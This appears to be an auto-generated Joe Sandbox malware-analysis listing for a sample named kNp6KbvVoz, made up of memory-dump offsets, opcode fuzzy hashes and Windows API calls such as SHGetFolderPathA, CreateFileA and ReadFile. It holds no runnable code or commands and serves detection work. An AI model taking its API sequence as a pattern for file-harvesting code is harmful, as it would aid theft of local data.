                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: .$GetProcAddress.$l
                                      • API String ID: 0-2784972518
                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                      • Instruction ID: 234526f98062d9d445f44a7804ddb95bc18d62171869177ca6b95dc8f827117e
                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                      • Instruction Fuzzy Hash: 603158B6900609CFEB11CF99C880BAEBBF9FF09368F14454AD541E7210D7B1EA45CBA4
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                      • GetSystemTime.KERNEL32(?,02E34B50,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: SystemTimelstrcpy
                                      • String ID:
                                      • API String ID: 62757014-0
                                      • Opcode ID: cce225ff94706f9395c058c90c0b5c4f8768ee8627e86dd20290b192b3a29a40
                                      • Instruction ID: 470bfa94025adedc24e37c5607c38d4270d2eadb7b78e810e6eac55b0552b998
                                      • Opcode Fuzzy Hash: cce225ff94706f9395c058c90c0b5c4f8768ee8627e86dd20290b192b3a29a40
                                      • Instruction Fuzzy Hash: 1211D331D011089FCB04EFA9D891AEE77BAEF58314F44C05EF41667185EF386984CBA6
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001D1D8), ref: 0041D21F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                      • Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
                                      • Opcode Fuzzy Hash: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                      • Instruction Fuzzy Hash: B19002F465151096860457755C4D5857A905E8D64675185A1AC06D4054DBA840409529
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(0041D1D8), ref: 048DD486
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                      • Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
                                      • Opcode Fuzzy Hash: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                      • Instruction Fuzzy Hash: B19002F465151096860457755C4D5857A905E8D64675185A1AC06D4054DBA840409529
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b2efdfdec92dc9210b77844374be35780428ca2a8b219193cf7102a7cd532072
                                      • Instruction ID: 46f3c3140983f1c0fb29b1add7b08ec4235feb6a90b363458631294e453f701b
                                      • Opcode Fuzzy Hash: b2efdfdec92dc9210b77844374be35780428ca2a8b219193cf7102a7cd532072
                                      • Instruction Fuzzy Hash: CB82E475A00F448FD365CF2AC8807A2B7E1BF8A304F548A1ED9EA8B751EB71B545CB50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 54423d445fcc40934ee9b0b29497ac89ac093eac2bdc85596de5d7ecbfa78b8c
                                      • Instruction ID: 477550dad5415dbaae39216314d4aca0696c0c7256b6eb9b267931fa7b0e28d5
                                      • Opcode Fuzzy Hash: 54423d445fcc40934ee9b0b29497ac89ac093eac2bdc85596de5d7ecbfa78b8c
                                      • Instruction Fuzzy Hash: D232F671E002199FDB14CF68C8807AEB7F6FF86311F148639E469AB399D734A941CB91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                      • Instruction ID: 32df0dffe840915e4ffeb90e3fa1f0843fd278270913b0136fc6a8622be0acaf
                                      • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                      • Instruction Fuzzy Hash: 5C4269707046418FC725EF19C090626BBE6BF89314F28CA7ED4968BB92D735F885CB91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                      • Instruction ID: b6d44a386fa5d8d2cb3b141fd4ca324eacfe6f94572880ea03f62f6efcf95f34
                                      • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                      • Instruction Fuzzy Hash: B0021671E002168FDB11CF79C8806AFB7E6AFDA354F15872AE855B7240E771BD428790
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                      • Instruction ID: 7ba366ef4ab383771aee1f46fbc8a171b8c905104b74219b69930d25ebcce415
                                      • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                      • Instruction Fuzzy Hash: 3BF169B22096A15FC71D8A1484B09BD7FD25BA9101F0ECAADFDD70F393D924EA01DB61
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                      • Instruction ID: 19122bfe16d85e15ad9a83dd4940a11035619af143b7253900cec4d9fabbe0bd
                                      • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                      • Instruction Fuzzy Hash: 90D18473F10A294BEB08CE99CC917ADB6E6EBD8350F19423ED916E7381D6B85D018790
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                      • Instruction ID: f86bad82262986651471c0ad82823f24731e7231b71886dd47e5e66c3ad868a5
                                      • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                      • Instruction Fuzzy Hash: 52028974E006588FCF16CFA8C4905EDBBB6FF89310F548169E8996B355C730AA91CB90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                      • Instruction ID: c53201af517fc6cd0e8ca390a67f9a099f263f86e51862aff906f69a8640bb68
                                      • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                      • Instruction Fuzzy Hash: 36020375E00619CFCF15CF98C4809ADB7B6FF88350F258569E84AAB364D731AA91CF90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                      • Instruction ID: 3a880987c836da2108b6e339fd7463165bf7a0d2327cc67aa90980fcfbfb3416
                                      • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                      • Instruction Fuzzy Hash: 13C15EB6E29B824BD3138B3DD842365F355AFE7295F05D72EFCE472942FB20A6814204
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                      • Instruction ID: 9b4123df6dd428b25428371c55568125420ddc114afde071c2d56d329f6a4cb1
                                      • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                      • Instruction Fuzzy Hash: 66D16571600B51CFE721CF28C984B67B7E5BB89304F14892EC88A8BB95E735F449CB90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                      • Instruction ID: f2f5d93a966ee4a9007c65032164315fb5e72b4725ce1b4fd2cf6bc8a7a868b8
                                      • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                      • Instruction Fuzzy Hash: 5FB18371A083119BD308CF65C85075BF7E2EFCC310F1ACA3EA999D7291D774E9459A82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                      • Instruction ID: 9350ab4b1cfd1ea7dd1df8fb5dd7cb30eb7406faae8cace4ea8e41f3259a0d03
                                      • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                      • Instruction Fuzzy Hash: 18B18372A083119FD318CF25C85176BF7E2EFC8310F1AC93EE89997291D774E9459A82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                      • Instruction ID: d2675a4950af693100bddbb283a58122ec6d2b3577e4036e4889b91ab9b77075
                                      • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                      • Instruction Fuzzy Hash: C8B11871A197118FD706EE3DC491215F7E1AFD6280F50CB2EE995B7762EB31E8818740
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5185ef17974cb1e7938c1049dfbfd6043ba02edff510d25e23a45b9cf056c98f
                                      • Instruction ID: a611908ee05d14a5a62287e8a1fadf160fba609cf6c6227fa72698cd5d1de5a2
                                      • Opcode Fuzzy Hash: 5185ef17974cb1e7938c1049dfbfd6043ba02edff510d25e23a45b9cf056c98f
                                      • Instruction Fuzzy Hash: A491F771F002159BDF14CEA8C882BBAB3AAAF5731AF094475DD19AB3A1D671FC018791
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                      • Instruction ID: 91a17360add09186d54fb74bd7b09fb574a4c787cf1e446257a8128ec47b647a
                                      • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                      • Instruction Fuzzy Hash: C3B19F35610608DFD715DF28C48AF657BE0FF85365F258668E899CF2A1C335EA81CB40
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                      • Instruction ID: 7e0bb84ff8a3df0c8aaa7cafcd4ba89abd24f0b815e9b46f40d1aec6a08f63aa
                                      • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                      • Instruction Fuzzy Hash: 5DC14A75A0471A8FC715DF28C08045AB3F2FF88350F258A6DE8999B721D731E996CF81
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                      • Instruction ID: 36b1731511516374f9343884b08086dc309f64f3a49b5e614224d967948bed6c
                                      • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                      • Instruction Fuzzy Hash: 61917B319287A16AF7128B3CCD417AEBB58FFD6340F10C72AF98872491FB71A5819345
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                      • Instruction ID: 9bdd5649cc72852436a5d971d48449891feeb442c56accdccb813ade552b9a3a
                                      • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                      • Instruction Fuzzy Hash: 3EA129B2A00A19CFEB19CF55CCC1AAABBB5FB49315F15C26AD41AE73A0D734A540CF50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                      • Instruction ID: a96c840bd9e1b9c2330c582e8afdec571a142b210284b38854727c5692e02ade
                                      • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                      • Instruction Fuzzy Hash: 20A16F72A087119FD318CF25C89075BF7E2EFC8710F1ACA3DE89997254D774E8419A82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                      • Instruction ID: 5c808e89dc00093107f21baf6ec992ae73e83ac362104a1362a038c02d994142
                                      • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                      • Instruction Fuzzy Hash: E8514B72E09BD589C7058B7944502EEBFB21FE6214F1F82AEC4981F382C3356689D3E5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089738538.0000000002E39000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E39000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2e39000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                      • Instruction ID: 3dc45f9d460110675a5f3d51c49df36a3601bc9bca23bcecd9c519cf14a5b28a
                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                      • Instruction Fuzzy Hash: EA118E72380100AFD744DF55DC84EA673EAEB99325B1980A5ED04CB316D77AE841CB60
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                      • Instruction ID: 3a599469b11089fb885ab22994c61ffeff4e0d83fdc2f0dd5a6c5ee646452c11
                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                      • Instruction Fuzzy Hash: 2101F772A00604CFDF21CFA0D804BAA33EAEB87245F154AA8E606D7241E370F8418B90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                      • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                                      • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                      • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                      • Instruction ID: 2ae1060ae522482c6b67b8f8aff12da6d71737e9147eba3a7211aa7e0a9f02b3
                                      • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                      • Instruction Fuzzy Hash: 2771F631412B809BE7727B36DD11E4977E17F02344F124F3692F6A0DB09AA27C6197D2
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                        • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                        • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                        • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                        • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                        • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                        • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                        • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                        • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
